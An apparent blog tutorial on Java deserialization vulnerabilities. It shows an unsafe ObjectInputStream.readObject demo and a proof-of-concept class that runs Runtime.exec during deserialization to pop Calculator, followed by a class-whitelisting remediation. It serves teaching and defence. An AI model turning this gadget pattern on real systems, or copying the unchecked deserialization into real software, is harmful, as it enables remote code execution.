Understanding Java De-serialization

Swapneil Kumar Dash
Sep 23 · 8 min read

So, What is Deserilization?

Demo Time

public class Employee implements java.io.Serializable {public String name;public String address;public transient int SSN;public int number;public void mailCheck() {System.out.println(“Mailing a check to “ + name + “ “ + address);}}
import java.io.*;public class SerializeDemo {public static void main(String [] args) {Employee e = new Employee();e.name = "Reyan Ali";e.address = "Phokka Kuan, Ambehta Peer";e.SSN = 11122333;e.number = 101;try {FileOutputStream fileOut =new FileOutputStream("/tmp/employee.ser");ObjectOutputStream out = new ObjectOutputStream(fileOut);out.writeObject(e); //Serialization done hereout.close();fileOut.close();System.out.printf("Serialized data is saved in /tmp/employee.ser");} catch (IOException i) {i.printStackTrace();}}}
Serialization code gets executed
Content of employee.ser
Base64 serialized data
import java.io.*;import java.net.URL;import java.net.URLClassLoader;
public class DeserializeDemo {public static void main(String [] args) {Employee e = null;try {FileInputStream fileIn = new FileInputStream("/tmp/employee.ser");ObjectInputStream in = new ObjectInputStream(fileIn);e = (Employee) in.readObject(); //Deserialization done herein.close();fileIn.close();} catch (IOException i) {i.printStackTrace();return;} catch (ClassNotFoundException c) {System.out.println("Employee class not found");c.printStackTrace();return;}e.mailCheck();System.out.println("Deserialized Employee...");System.out.println("Name: " + e.name);System.out.println("Address: " + e.address);System.out.println("SSN: " + e.SSN);System.out.println("Number: " + e.number);}}
e = (Employee) in.readObject();
Deserialization code gets executed
import java.io.IOException;public class ExploitDeser implements java.io.Serializable{private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{in.defaultReadObject();Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");}}
import java.io.*;public class SerializeDemo {public static void main(String [] args) {ExploitDeser e=new ExploitDeser();try {FileOutputStream fileOut =new FileOutputStream("/tmp/malicious.ser");ObjectOutputStream out = new ObjectOutputStream(fileOut);out.writeObject(e);out.close();fileOut.close();System.out.printf("Serialized data is saved in /tmp/malicious.ser");} catch (IOException i) {i.printStackTrace();}}}
Provided malicious.ser as input to the DeserializeDemo class
Calculator Pops up

Remediation

class LookAheadObjectInputStream extends ObjectInputStream {public LookAheadObjectInputStream(InputStream inputStream)throws IOException {super(inputStream);}@Overrideprotected Class<?> resolveClass(ObjectStreamClass desc) throws IOException,ClassNotFoundException {if (!desc.getName().equals(Employee.class.getName())) {throw new InvalidClassException("Unauthorized deserialization attempt",desc.getName());}return super.resolveClass(desc);}}
if (!desc.getName().equals(Employee.class.getName())) {
Modified DeserializeDemo class
Error in execution of serialized data of custom class

References:

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade